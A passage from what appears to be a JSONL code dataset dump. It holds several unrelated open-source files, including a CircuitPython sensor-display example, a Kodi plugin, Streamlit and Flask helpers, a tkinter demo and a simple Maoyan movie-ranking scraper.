bitmap_font.load_font(\"fonts/Helvetica-Bold-16.bdf\")\nfont_arial = bitmap_font.load_font(\"/fonts/Arial-16.bdf\")\nfont_term = terminalio.FONT\n\n# create the page layout\ntest_page_layout = TabLayout(\n x=0,\n y=0,\n display=board.DISPLAY,\n tab_text_scale=2,\n custom_font=font_term,\n inactive_tab_spritesheet=\"lib/adafruit_displayio_layout/examples/bmps/inactive_tab_sprite.bmp\",\n showing_tab_spritesheet=\"lib/adafruit_displayio_layout/examples/bmps/active_tab_sprite.bmp\",\n showing_tab_text_color=0x00AA59,\n inactive_tab_text_color=0xEEEEEE,\n inactive_tab_transparent_indexes=(0, 1),\n showing_tab_transparent_indexes=(0, 1),\n tab_count=4,\n)\n# make 4 pages of content\npge1_group = displayio.Group()\npge2_group = displayio.Group()\npge3_group = displayio.Group()\npge4_group = displayio.Group()\n# make 1 background group\nbg_group = displayio.Group()\n\n\"\"\"\n From: https://learn.adafruit.com/making-a-pyportal-user-interface-displayio/the-full-code\n\"\"\"\n\n\n# This will handle switching Images and Icons\ndef set_image(group, filename):\n \"\"\"Set the image file for a given goup for display.\n This is most useful for Icons or image slideshows.\n :param group: The chosen group\n :param filename: The filename of the chosen image\n \"\"\"\n print(\"Set image to \", filename)\n image = None\n image_sprite = None\n if group:\n group.pop()\n if not filename:\n return # we're done, no icon desired\n # CircuitPython 6 & 7 compatible\n try:\n image = displayio.OnDiskBitmap(filename)\n except OSError as exc:\n if exc.args[0] == 2: # No such file/directory\n return\n if image is not None:\n image_sprite = displayio.TileGrid(\n image,\n pixel_shader=getattr(image, \"pixel_shader\", displayio.ColorConverter()),\n )\n if image_sprite is not None:\n main_group.append(image_sprite)\n\n\n# ------------- Setup for Images ------------- #\n\nbg_group = displayio.Group()\nset_image(bg_group, \"/images/BGimage4.bmp\")\nprint(\n \"Please wait...building-up things...\"\n) # 2022-05-08 13h19 (utc+1) It takes 24 seconds from here to start of main() loop\nmain_group.append(bg_group)\n\nicon_group = displayio.Group()\nicon_group.x = 180\nicon_group.y = 120\nicon_group.scale = 1\npge2_group.append(icon_group)\n\n# labels\npge1_lbl = Label(\n font=font_term,\n scale=2,\n text=\"This is the first page!\",\n anchor_point=(0, 0),\n anchored_position=(10, 10),\n)\npge1_lbl2 = Label(\n font=font_term,\n scale=2,\n text=\"Please wait...\",\n anchor_point=(0, 0),\n anchored_position=(10, 150),\n)\npge2_lbl = Label(\n font=font_term,\n scale=2,\n text=\"This page is the second page!\",\n anchor_point=(0, 0),\n anchored_position=(10, 10),\n)\npge3_lbl = Label(\n font=font_term,\n scale=2,\n text=myVars.read(\"pge3_lbl_dflt\"), # Will be \"Date/time:\"\n anchor_point=(0, 0),\n anchored_position=(10, 10),\n)\npge3_lbl2 = Label(\n font=font_term,\n scale=2,\n text=\"\", # pge3_lbl2_dflt, # Will be DD-MO-YYYY or Month-DD-YYYY\n anchor_point=(0, 0),\n anchored_position=(10, 40),\n)\npge3_lbl3 = Label(\n font=font_term,\n scale=2,\n text=\"\", # pge3_lbl3_dflt, # Will be HH:MM:SS\n anchor_point=(0, 0),\n anchored_position=(10, 70),\n)\npge3_lbl4 = Label(\n font=font_term,\n scale=2,\n text=\"\", # pge3_lbl3_dflt, # Will be time until next NTP sync in MM:SS\n anchor_point=(0, 0),\n anchored_position=(10, 200),\n)\npge4_lbl = Label(\n font=font_term,\n scale=2,\n text=myVars.read(\"pge4_lbl_dflt\"),\n anchor_point=(0, 0),\n anchored_position=(10, 10),\n)\npge4_lbl2 = Label(\n font=font_term,\n scale=2,\n text=\"\", # Will be \"Temperature\"\n anchor_point=(0, 0),\n anchored_position=(10, 130),\n)\npge4_lbl3 = Label(\n font=font_arial, # bitmap_font.load_font(\"/fonts/Arial-16.bdf\"),\n scale=2,\n text=\"\", # Will be \"xx.yy ºC\"\n anchor_point=(0, 0),\n anchored_position=(10, 160),\n)\n\n# shapes\nsquare = Rect(x=20, y=70, width=40, height=40, fill=0x00DD00)\ncircle = Circle(50, 100, r=30, fill=0xDD00DD)\ntriangle = Triangle(50, 0, 100, 50, 0, 50, fill=0xDDDD00)\nrectangle = Rect(x=80, y=60, width=100, height=50, fill=0x0000DD)\n\ntriangle.x = 80\ntriangle.y = 70\n\n# add everything to their page groups\npge1_group.append(square)\npge1_group.append(pge1_lbl)\npge1_group.append(pge1_lbl2)\npge2_group.append(pge2_lbl)\npge2_group.append(circle)\npge3_group.append(pge3_lbl)\npge3_group.append(pge3_lbl2)\npge3_group.append(pge3_lbl3)\npge3_group.append(pge3_lbl4)\npge3_group.append(triangle)\npge4_group.append(pge4_lbl)\npge4_group.append(pge4_lbl2)\npge4_group.append(pge4_lbl3)\npge4_group.append(rectangle)\n\nif board.board_id == \"pyportal_titano\":\n pages = {0: \"Dum\", 1: \"One\", 2: \"Two\", 3: \"Three\", 4: \"Four\"}\nelse:\n pages = {0: \"Dum\", 1: \"One\", 2: \"Two\", 3: \"Thr\", 4: \"For\"}\n\n# add the pages to the layout, supply your own page names\ntest_page_layout.add_content(pge1_group, pages[1])\ntest_page_layout.add_content(pge2_group, pages[2])\ntest_page_layout.add_content(pge3_group, pages[3])\ntest_page_layout.add_content(pge4_group, pages[4])\n# test_page_layout.add_content(displayio.Group(), \"page_5\")\n# add it to the group that is showing on the display\nmain_group.append(test_page_layout)\n# test_page_layout.tab_tilegrids_group[3].x += 50\n# ---------- Text Boxes ------------- #\n# Set the font and preload letters\n# font = bitmap_font.load_font(\"/fonts/Arial-16.bdf\") # was: Helvetica-Bold-16.bdf\")\n# font.load_glyphs(b\"abcdefghjiklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890- ()\")\nglyphs = b' \"(),-.0123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\nfont_arial.load_glyphs(glyphs)\nfont_arial.load_glyphs((\"°\",)) # a non-ascii character we need\n# font=font_term.collect() # ADDED by @PaulskPt --\n# to prevent MemoryError - memory allocation failed,\n# allocating 6444 bytes\n\npge2_group = 1\n\n\n\"\"\"If the temperature sensor has been disconnected,\n this function will try to reconnect (test if the sensor is present by now)\n If reconnected this function creates the temp_sensor object\"\"\"\n\n\ndef connect_temp_sensor():\n t = \"temperature sensor found\"\n\n # myVars.write(\"temp_sensor\",None)\n\n try:\n myVars.write(\"temp_sensor\", adafruit_tmp117.TMP117(i2c))\n except ValueError: # ValueError occurs if the temperature sensor is not connected\n pass\n\n print(\n \"connect_temp_sensor(): type(temp_sensor) object = \",\n type(myVars.read(\"temp_sensor\")),\n )\n if myVars.read(\"temp_sensor\") is not None:\n print(t)\n print(\"temperature sensor connected\")\n myVars.write(\"t0\", \"Temperature\")\n if myVars.read(\"temp_in_fahrenheit\"):\n myVars.write(\"t1\", chr(186) + \"F\")\n else:\n myVars.write(\"t1\", chr(186) + \"C\")\n myVars.write(\"t2\", 27 * \"_\")\n else:\n print(\"no \" + t)\n print(\"failed to connect temperature sensor\")\n myVars.write(\"t0\", None)\n myVars.write(\"t1\", None)\n myVars.write(\"t2\", None)\n\n\n\"\"\" If the external rtc has been disconnected,\n this function will try to reconnect (test if the external rtc is present by now)\"\"\"\n\n\ndef connect_rtc():\n t = \"RTC found\"\n\n # myVars.write(\"rtc\",None)\n\n try:\n myVars.write(\"rtc\", DS3231(i2c)) # i2c addres 0x68\n # myVars.write(\"rtc\",rtc)\n except ValueError:\n pass\n\n print(\"connect_rtc() type rtc object = \", type(myVars.read(\"rtc\")))\n if myVars.read(\"rtc\") is not None:\n print(t)\n print(\"RTC connected\")\n if myVars.read(\"lStart\"):\n myVars.write(\"lStart\", False)\n myVars.read(\"rtc\").datetime = myVars.read(\"default_dt\")\n else:\n print(\"no \" + t)\n print(\"Failed to connect RTC\")\n\n\n\"\"\"Function gets a value from the external temperature sensor\n It only updates if the value has changed compared to the previous value\n A fixed text is set in pge4_lbl2.text. The variable temperature value is set in pge4_lbl3.text\n If no value obtained (for instance if the sensor is disconnected),\n the function sets the pge4_lbl to a default text and makes empty\n pge4_lbl2.text and pge4_lbl3.text\"\"\"\n\n\ndef get_temp():\n my_debug = myVars.read(\"my_debug\")\n showing_page_idx = test_page_layout.showing_page_index\n RetVal = False\n if myVars.read(\"temp_sensor\") is not None:\n try:\n temp = myVars.read(\"temp_sensor\").temperature\n if myVars.read(\"temp_in_fahrenheit\"):\n temp = (temp * 1.8) + 32\n t = \"{:5.2f}{} \".format(temp, myVars.read(\"t1\"))\n if my_debug and temp is not None and not myVars.read(\"temp_in_REPL\"):\n myVars.write(\"temp_in_REPL\", True)\n print(\"get_temp(): {} {}\".format(myVars.read(\"t0\"), t))\n if showing_page_idx == 3: # show temperature on most right Tab page\n if temp is not None:\n if temp != myVars.read(\n \"old_temp\"\n ): # Only update if there is a change in temperature\n myVars.write(\"old_temp\", temp)\n t = \"{:5.2f}{} \".format(temp, myVars.read(\"t1\"))\n pge4_lbl.text = \"\"\n pge4_lbl2.text = myVars.read(\"t0\")\n pge4_lbl3.text = t\n # if not my_debug:\n # print(\"pge4_lbl.tex.gvars {}\".format(pge4_lbl.text))\n # time.sleep(2)\n RetVal = True\n else:\n t = \"\"\n pge4_lbl.text = myVars.read(\"pge4_lbl_dflt\")\n except OSError:\n print(\"Temperature sensor has disconnected\")\n t = \"\"\n myVars.write(\"temp_sensor\", None)\n pge4_lbl.text = myVars.read(\n \"pge4_lbl_dflt\"\n ) # clean the line (eventually: t2)\n pge4_lbl2.text = \"Sensor disconnected.\"\n pge4_lbl3.text = \"Check wiring.\"\n return RetVal\n\n\n# Moved these six definitions outside handle_dt()\n# to correct pylint error 'too many variables'\ndt_ridxs = {\"yy\": 0, \"mo\": 1, \"dd\": 2, \"hh\": 3, \"mm\": 4, \"ss\": 5}\n\n# print(\"dict dt_ridxs =\", dt_ridxs.keys())\n\n\n\"\"\" Function called by get_dt()\n Created to repair pylint error R0912: Too many branches (13/12)\"\"\"\n\n\ndef handle_dt(dt):\n my_debug = myVars.read(\"my_debug\")\n RetVal = False\n s = \"Date/time: \"\n sYY = str(dt[dt_ridxs[\"yy\"]]) # was: str(dt[yy])\n # print(\"dt_ridxs[\"mo\"] = \", dt_ridxs[\"mo\"])\n # modified mo because plynt error R0914 'Too many local variables'\n # mo = dt_ridxs[\"mo\"]\n dd = dt_ridxs[\"dd\"]\n hh = dt_ridxs[\"hh\"]\n mm = dt_ridxs[\"mm\"]\n ss = dt_ridxs[\"ss\"]\n if \"mo\" in dt_ridxs:\n sMO = (\n months[dt[dt_ridxs[\"mo\"]]] # was: months[dt[mo]]\n if myVars.read(\"use_txt_in_month\")\n else \"0\" + str(dt[dt_ridxs[\"mo\"]])\n if dt[dt_ridxs[\"mo\"]] < 10\n else str(dt[dt_ridxs[\"mo\"]])\n )\n else:\n raise KeyError(\"key {} not in dt_ridxs dict\".format(\"mo\"))\n\n dt_dict = {}\n\n for _ in range(dd, ss + 1):\n dt_dict[_] = \"0\" + str(dt[_]) if dt[_] < 10 else str(dt[_])\n\n if my_debug:\n print(\"dt_dict = \", dt_dict)\n\n myVars.write(\"c_secs\", dt_dict[ss])\n sDT = (\n sMO + \"-\" + dt_dict[dd] + \"-\" + sYY\n if myVars.read(\"use_usa_notation\")\n else sYY + \"-\" + sMO + \"-\" + dt_dict[dd]\n )\n if my_debug:\n print(\"handle_dt(): sDT_old = {}, sDT = {}\".format(myVars.read(\"sDT_old\"), sDT))\n if myVars.read(\"sDT_old\") != sDT:\n myVars.write(\"sDT_old\", sDT)\n myVars.write(\"dt_refresh\", True) # The date has changed, set the refresh flag\n sDT2 = dt_dict[hh] + \":\" + dt_dict[mm] + \":\" + dt_dict[ss]\n\n if myVars.read(\"dt_refresh\"): # only refresh when needed\n myVars.write(\"dt_refresh\", False)\n pge3_lbl.text = s\n pge3_lbl2.text = sDT\n\n if myVars.read(\"c_secs\") != myVars.read(\"o_secs\"):\n myVars.write(\"o_secs\", myVars.read(\"c_secs\"))\n sDT3 = s + \"{} {}\".format(sDT, sDT2)\n print(sDT3)\n\n pge3_lbl3.text = sDT2\n if my_debug:\n print(\"pge3_lbl.text = {}\".format(pge3_lbl.text))\n print(\"pge3_lbl2.text = {}\".format(pge3_lbl2.text))\n print(\"pge3_lbl3.text = {}\".format(pge3_lbl3.text))\n RetVal = True\n\n # Return from here with a False but don't set the pge3_lbl to default.\n # It is only to say to the loop() that we did't update the datetime\n return RetVal\n\n\n\"\"\"Function gets the date and time:\n a) if an rtc is present from the rtc;\n b) if using online NTP pool server then get the date and time from the function time.localtime\n This time.localtime has before been set with data from the NTP server.\n In both cases the date and time will be set to the pge3_lbl, pge3_lbl12 and pge3_lbl3\n If no (valid) date and time received then a default text will be shown on the pge3_lbl\"\"\"\n\n\ndef get_dt():\n dt = None\n RetVal = False\n\n if myVars.read(\"rtc\") is not None:\n try:\n dt = myVars.read(\"rtc\").datetime\n except OSError as exc:\n if myVars.read(\"my_debug\"):\n print(\"Error number: \", exc.args[0])\n if exc.args[0] == 5: # Input/output error\n print(\"get_dt(): OSError occurred. RTC probably is disconnected\")\n pge3_lbl.text = myVars.read(\"pge3_lbl_dflt\")\n myVars.write(\"sDT_old\", \"\")\n pge3_lbl2.text = \"\"\n pge3_lbl3.text = \"\"\n return RetVal\n raise # Handle other errors\n\n elif myVars.read(\"online_time_present\") or myVars.read(\"use_ntp\"):\n dt = time.localtime()\n\n if myVars.read(\"my_debug\"):\n print(\"get_dt(): dt = \", dt)\n if dt is not None:\n RetVal = handle_dt(dt)\n else:\n pge3_lbl.text = myVars.read(\"pge3_lbl_dflt\")\n pge3_lbl2.text = \"\"\n pge3_lbl3.text = \"\"\n return RetVal\n\n\n\"\"\" hms_to_cnt()\n function returns a integer value representing\n the conversion from the current hours, minutes and seconds\n into seconds\"\"\"\n\n\ndef hms_to_cnt():\n dt = time.localtime() # get the local time as a time_struct\n return (dt.tm_hour * 3600) + (dt.tm_min * 60) + dt.tm_sec\n\n\n\"\"\" Created this function to correct pylint errors:\n 'Too many branches' R0912 and\n 'Too many statements' R0915\"\"\"\n\n\ndef ck_next_NTP_sync():\n s_cnt = myVars.read(\"s_cnt\")\n c_cnt = hms_to_cnt() # set current count (seconds)\n c_elapsed = c_cnt - s_cnt\n if c_elapsed < 10: # continue only when c_elapsed >= 10\n return\n TAG = \"ck_next_NTP_sync(): \"\n my_debug = myVars.read(\"my_debug\")\n t1 = myVars.read(\"next_NTP_sync_t1\")\n t3 = myVars.read(\"next_NTP_sync_t3\")\n five_min = myVars.read(\"five_min_cnt\")\n myVars.write(\"s_cnt\", hms_to_cnt())\n # --- five minutes count down calculations #1 ---\n if my_debug:\n print(\n TAG + \"five_min = {}, s_cnt = {}, c_cnt = {}\".format(five_min, s_cnt, c_cnt)\n )\n print(TAG + \"c_elapsed = \", c_elapsed)\n\n # --- five minutes count down calculations #2 ---\n myVars.write(\"s_cnt\", c_cnt) # remember c_cnt\n five_min -= 10\n myVars.write(\"five_min_cnt\", five_min) # remember count\n mm2 = five_min // 60\n ss2 = five_min - (mm2 * 60)\n t2 = \"{:02d}:{:02d}\".format(mm2, ss2)\n t0 = t1 + t2 + t3\n print(t0)\n pge3_lbl4.text = t0\n if five_min == 0: # five minutes passed\n pge3_lbl4.text = \"\"\n myVars.write(\"five_min_cnt\", 300) # reset count\n myVars.write(\"ntp_refresh\", True)\n\n\ndef inc_cnt(cnt):\n cnt += 1\n if cnt > 999:\n cnt = 0\n return cnt\n\n\ndef main():\n cnt = 1\n wipe_pge1_lbl2_text = False\n print(\"Starting loop\")\n pge1_lbl2.text = \"Ready...\"\n myVars.write(\"five_min_cnt\", 300) # 5 minutes\n myVars.write(\"s_cnt\", hms_to_cnt()) # set start count (seconds)\n use_ntp = myVars.read(\"use_ntp\")\n rtc = myVars.read(\"rtc\")\n otp = myVars.read(\"online_time_present\")\n # print(\"Starting loop\")\n while True:\n touch = ts.touch_point\n try:\n if use_ntp:\n ck_next_NTP_sync()\n ntp_refresh = myVars.read(\"ntp_refresh\")\n # ------------- Handle Tab touch ------------- #\n # print(\"main() value touch: \", touch)\n if touch: # Only do this if the screen is touched\n if not wipe_pge1_lbl2_text:\n pge1_lbl2.text = \"\" # Clear the label\n wipe_pge1_lbl2_text = True\n test_page_layout.handle_touch_events(touch)\n if rtc is not None or otp:\n if otp and ntp_refresh:\n refresh_from_NTP() # first re-synchronize internal clock from NTP server\n if get_dt():\n print(\"Loop nr: {:03d}\".format(cnt))\n else:\n connect_rtc()\n if myVars.read(\"temp_sensor\") is not None:\n get_temp()\n else:\n connect_temp_sensor()\n touch = (\n ts.touch_point\n ) # Just to try - it looks like after re-connecting the sensor,\n # the touch data has lost\n if myVars.read(\"temp_in_REPL\"):\n myVars.write(\"temp_in_REPL\", False)\n cnt = inc_cnt(cnt)\n except KeyboardInterrupt as exc:\n print(\"Keyboard interrupt...exiting...\")\n raise KeyboardInterrupt from exc\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"adafruit/Adafruit_CircuitPython_DisplayIO_Layout","sub_path":"examples/hotplug_sensor_examples/displayio_layout_hotplug_temp_sensor.py","file_name":"displayio_layout_hotplug_temp_sensor.py","file_ext":"py","file_size_in_byte":31719,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"70"}
+{"seq_id":"586403046","text":"import plugintools\nfrom logos import logos_bands\n\nLIVE_SHOWS = \"plugin://plugin.video.youtube/playlist/PLGuhlLazJwGsqskC5RY0qt8Pk0xclK14f/\"\nOFFICIAL_VIDEOS = \"plugin://plugin.video.youtube/playlist/PLF84630BDCCB15277/\"\nBEST_OF = \"plugin://plugin.video.youtube/playlist/PLe7ia_jeVGd_vsqcTDyeeOHawvqoBFGbK/\"\n\ndef accept1(params):\n logo=logos_bands.accept(params)\n\n plugintools.add_item( \n title=\"Live Shows\",\n url=LIVE_SHOWS,\n thumbnail=logo,folder=True )\n \n plugintools.add_item( \n title=\"Official Videos\",\n url=OFFICIAL_VIDEOS,\n thumbnail=logo, folder=True )\n \n plugintools.add_item( \n title=\"Official Best of\",\n url=BEST_OF,\n thumbnail=logo, folder=True )\n\n\n","repo_name":"kodimetalbox/repo5","sub_path":"plugin.video.MetalOnMetal/bands/accept.py","file_name":"accept.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42760271391","text":"import streamlit as st\n\n\ndef use_custom_css():\n with open(\"custom.css\") as custom_css:\n return st.write(f'', unsafe_allow_html=True)\n\n\ndef check_openai_key():\n if st.session_state.get(\"api_success\", False) is False:\n st.warning(\"\"\"\n No OpenAI key was found! If you don't set the OpenAI Key, none of the exercises here will work.\n \"\"\", icon=\"🤦♀️\")\n with st.form(\"openai_key_form\"):\n st.subheader(\"Enter your OpenAI API Key\")\n st.text_input(\"OpenAI API Key\", placeholder=\"sk-...\", key=\"openai_key\")\n\n submitted = st.form_submit_button(\"Submit\")\n\n if submitted:\n from openai.error import AuthenticationError\n try:\n import openai\n openai.api_key = st.session_state.openai_key\n openai.Model.list()\n except AuthenticationError:\n st.session_state[\"api_success\"] = False\n st.error(\n \"An incorrect API Key was provided. You can find your API key at \"\n \"https://platform.openai.com/account/api-keys.\"\n )\n return\n st.session_state[\"api_success\"] = True\n st.success(\"Success! You are good to go.\", icon=\"🎉\")\n\n\ndef write_footer():\n st.divider()\n st.write(\n \"\"\"\nPrompt Engineering for Lawyers © 2023 by Ang Hou Fu is licensed under Attribution-ShareAlike 4.0 International \n[](https://github.com/houfu/prompt-engineering-lawyers) \n \"\"\"\n )\n","repo_name":"houfu/prompt-engineering-lawyers","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"14893047002","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom __future__ import annotations\nfrom typing import List, Dict\n\n\nclass Target:\n _supported_targets = ['cuda', 'cpu']\n\n def __init__(self, name: str, flags: List[str], attrs: Dict[str, str]):\n if name not in self._supported_targets:\n raise ValueError('Does not support target {}, candidates {}.'.format(name, self._supported_targets))\n self.name = name\n self.flags: List[str] = flags\n self.attrs: Dict[str, str] = attrs\n\n self._check()\n\n @staticmethod\n def from_string(target_string: str) -> Target:\n items: List[str] = target_string.strip().split()\n name, items = items[0], items[1:]\n flags = []\n attrs = {}\n for item in items:\n if item.startswith('--'):\n key, value = item[2:].split('=')\n attrs[key] = value\n elif item.startswith('-'):\n flags.append(item)\n else:\n raise ValueError('Cannot recognize target item \"{}\".'.format(item))\n return Target(name, flags, attrs)\n\n def _check(self):\n if self.name == 'cpu':\n valid_flags = []\n valid_attrs = {}\n elif self.name == 'cuda':\n valid_flags = []\n valid_attrs = ['arch'] # e.g., '--arch=sm_80'\n else:\n raise ValueError('Cannot recognize target \"{}\".'.format(self.name))\n for flag in self.flags:\n if flag not in valid_flags:\n raise ValueError('Invalid flag \"{}\" for target \"{}\".'.format(flag, self.name))\n for attr in self.attrs:\n if attr not in valid_attrs:\n raise ValueError('Invalid attribute \"{}\" for target \"{}\".'.format(attr, self.name))\n","repo_name":"hidet-org/hidet","sub_path":"python/hidet/ir/target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":546,"dataset":"github-code","pt":"70"}
+{"seq_id":"27549332905","text":"from tkinter import *\n\nroot = Tk()\n\nplaya = IntVar()\nmontania = IntVar()\nturismoRural = IntVar()\n\ndef opcionesViaje():\n opcionesElegidas = \"\"\n if playa.get() == 1:\n opcionesElegidas+= \" Playa\"\n if montania.get() == 1:\n opcionesElegidas+= \" Montaña\"\n if turismoRural.get() == 1:\n opcionesElegidas+= \" Turismo rural\"\n\n textoFinal.config(text = opcionesElegidas)\n\n\nframe = Frame(root)\nframe.pack()\n\nLabel(frame, text = \"Elije destinos\", width = 50).pack()\n\nCheckbutton(frame, text = \"Playa\", variable = playa, onvalue = 1, offvalue = 0, command=opcionesViaje).pack()\nCheckbutton(frame, text = \"Montaña\", variable = montania, onvalue = 1, offvalue = 0, command=opcionesViaje).pack()\nCheckbutton(frame, text = \"Turismo rural\", variable = turismoRural, onvalue = 1, offvalue = 0, command=opcionesViaje).pack()\n\ntextoFinal = Label(frame)\ntextoFinal.pack()\n\nroot.mainloop()\n","repo_name":"ciriusblb/python","sub_path":"checkButtons.py","file_name":"checkButtons.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"20041104510","text":"from flask import request, jsonify\nfrom flask.views import MethodView\nfrom flask_jwt import jwt_required, current_user\n\nfrom app import db\n\n\nclass UsersAPI(MethodView):\n\n @jwt_required()\n def get(self):\n return jsonify(current_user.serialize)\n\n @jwt_required()\n def patch(self):\n data = request.get_json(force=True)\n try:\n for field, value in data.items():\n if field in UsersAPI.allowed_fields:\n setattr(current_user, field, value)\n else:\n raise KeyError()\n db.session.add(current_user)\n db.session.commit()\n return jsonify({'success': 1})\n except Exception as e:\n return jsonify({'success': 0})\n\n @classmethod\n def register(cls, mod):\n url = '/users'\n symfunc = cls.as_view('users_api')\n mod.add_url_rule(url, view_func=symfunc, methods=['GET', 'PATCH'])\n","repo_name":"vladi-dev/emve-backend","sub_path":"app/api/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"23189033902","text":"from texta_elastic.core import ElasticCore\n\n\n'''For storing constant variables'''\n# Default max description lenght for models\nMAX_DESC_LEN = 1000\n\n\ndef get_field_choices():\n \"\"\"\n Retrieves field options from ES.\n \"\"\"\n es = ElasticCore()\n if es.connection:\n return [(a, '{0} - {1}'.format(a['index'], a['path'])) for a in es.get_fields()]\n else:\n return []\n","repo_name":"texta-tk/texta","sub_path":"toolkit/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"70"}
+{"seq_id":"36106249726","text":"from collections import Counter\n\n\ndef main():\n class1 = [\"Alice\", \"Bob\", \"Charlie\", \"David\",\n \"Eve\", \"Charlie\", \"David\", \"Fred\"]\n class2 = [\"Fred\", \"Gary\", \"Helen\", \"Ivan\", \"Jack\", \"Helen\", \"Alice\"]\n\n c1 = Counter(class1)\n c2 = Counter(class2)\n\n c1.update(class2)\n print(c1)\n # Prints the total number of students in both classes presenting an individual count for each student\n print(sum(c1.values()))\n\n\n# THIS COUNTS THE WORDS IN A TEXT FILE\n# with open(\"texto.txt\", \"r\") as fp:\n# def count_words(text):\n# # print(Counter(text).most_common())\n# return (Counter(text.split()))\n\n# words = count_words(fp.read())\n\n# THIS READS A TEXT FILE AND PRINTS IT\nfp = open('texto.txt', 'r')\nfor i, line in enumerate(iter(fp.readline, '')):\n print(line)\n# THIS DOES IT TOO\n# with open('texto.txt', 'r') as file:\n# text = file.read()\n# print(text)\n","repo_name":"jayad23/study_py","sub_path":"counter_class.py","file_name":"counter_class.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74462401179","text":"import re,time,random\r\nfrom urllib import request,parse\r\n\r\nclass MaoYanSpider:\r\n def __init__(self):\r\n \"\"\"定义常用变量\"\"\"\r\n self.url = 'https://www.maoyan.com/board/4?offset={}'\r\n self.headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36'}\r\n # 添加计数变量\r\n self.i = 0\r\n\r\n def get_html(self,url):\r\n \"\"\"获得响应内容\"\"\"\r\n req = request.Request(url = url,headers = self.headers)\r\n res = request.urlopen(req)\r\n html = res.read().decode('utf-8')\r\n \"\"\"直接调用解析函数\"\"\"\r\n self.parse_html(html)\r\n\r\n\r\n def parse_html(self,html):\r\n \"\"\"解析提取数据\"\"\"\r\n regex = '.*?title=\"(.*?)\".*?
(.*?)
.*?
(.*?)
'\r\n pattern = re.compile(regex,re.S) # 创建一个正则表达式的对象\r\n r_list = pattern.findall(html) # 元素类型是列表\r\n self.save_html(r_list)\r\n\r\n def save_html(self,r_list):\r\n \"\"\"数据处理函数\"\"\"\r\n # 制作一个空字典\r\n item = {}\r\n \"\"\" with open(filename,'w',encoding = 'utf-8') as f:\r\n f.write(html)\"\"\"\r\n for r in r_list:\r\n # 空字典的赋值操作\r\n item['name'] = r[0].strip() # strip()函数去除字符串左右两边的空格\r\n item['star'] = r[1].strip()\r\n item['time'] = r[2].strip()\r\n print(item)\r\n self.i += 1\r\n\r\n def run(self):\r\n \"\"\"函数入口\"\"\"\r\n for offset in range(10,91,10):\r\n url = self.url.format(offset) #拼接\r\n self.get_html(url) #数据抓取\r\n # 控制数据抓取频率\r\n time.sleep(random.randint(1,2))\r\n\r\nif __name__ == '__main__':\r\n spider = MaoYanSpider()\r\n spider.run()\r\n print(\"电影抓取的数量为:\",spider.i)\r\n\r\n\"\"\"\r\n
.*?title=\"(.*?)\".*?
(.*?)
.*?
(.*?)
\r\n\"\"\"\r\n\r\n\"\"\"\r\n
.*?title=\"(.*?)\".*?
(.*?)
.*?
(.*?)
\r\n\"\"\"","repo_name":"BanTanger/Initial-programming","sub_path":"py_Spider_project/07_maoyanspider.py","file_name":"07_maoyanspider.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"38932517102","text":"def MSBPosition(N) :\n \n msb_p = -1\n while (N) :\n N = N >> 1\n msb_p += 1\n \n return msb_p\n \n \n# Returns the Bitwise OR of all\n# integers between L and R\ndef findBitwiseOR(L, R) :\n \n res = 0\n \n # Find the MSB position in L\n msb_p1 = MSBPosition(L)\n \n # Find the MSB position in R\n msb_p2 = MSBPosition(R)\n \n while (msb_p1 == msb_p2) :\n res_val = (1 << msb_p1)\n \n # Add this value until msb_p1 and\n # msb_p2 are same;\n res += res_val\n \n L -= res_val\n R -= res_val\n \n # Calculate msb_p1 and msb_p2\n msb_p1 = MSBPosition(L)\n msb_p2 = MSBPosition(R)\n \n # Find the max of msb_p1 and msb_p2\n msb_p1 = max(msb_p1, msb_p2)\n \n # Set all the bits from msb_p1 upto\n # 0th bit in the result\n for i in range(msb_p1, -1, -1) :\n res_val = (1 << i)\n res += res_val\n \n return res\n \n \n# Driver Code\nif __name__ == \"__main__\" :\n \n L , R= 1,32767\n print(findBitwiseOR(L, R))\n ","repo_name":"Sandhya788/ss","sub_path":"bhavyashare/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
